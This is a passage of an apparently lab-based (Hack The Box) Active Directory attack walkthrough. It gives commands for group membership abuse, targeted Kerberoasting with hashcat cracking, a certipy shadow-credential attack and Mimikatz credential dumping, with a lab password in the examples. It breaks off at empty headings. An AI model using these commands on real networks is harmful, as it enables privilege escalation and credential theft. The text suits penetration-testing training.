# From Linux## Using net rpcnet rpc group addmem "group" "username" -U "domain"/'username'%'password' -S <DC-IP>### Example:net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70## Using bloodyADbloodyAD --host <DC-IP> -d <domain> -u <username> -p <password> add groupMember <group> <username>### Example:bloodyAD --host "10.10.11.70" -d "puppy.htb" -u "levi.james" -p 'KingofAkron2025!' add groupMember "DEVELOPERS" "levi.james"
As the user is now part of the group, we can try a targeted Kerberoast attack:
python3 targetedKerberoast.py -v -d "domain" -u "username" -p "password"[*] Starting kerberoast attacks[*] Fetching usernames from Active Directory with LDAP[+] Printing hash for (ca_svc)...
Ended up with list of Kerberos5 TGS-REP etype23 hashes, at this point, either trying to crack it with hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt or use certipy for shadow credential attack:
certipy shadow auto -u <username>@<domain> -p 'password' -k -dc-host <domain_controller> -account <targeted_account>Certipy v5.0.2 - by Oliver Lyak (ly4k)...
Post-Exploitation
Mimikatz:
# Elevate to SYSTEMgetsystem# Load Mimikatz in Meterpreterload kiwicreds_all # Dump credentials
Lateral Movement:
With Administrator credentials, use psexec to move laterally:
Hash Format Requirement: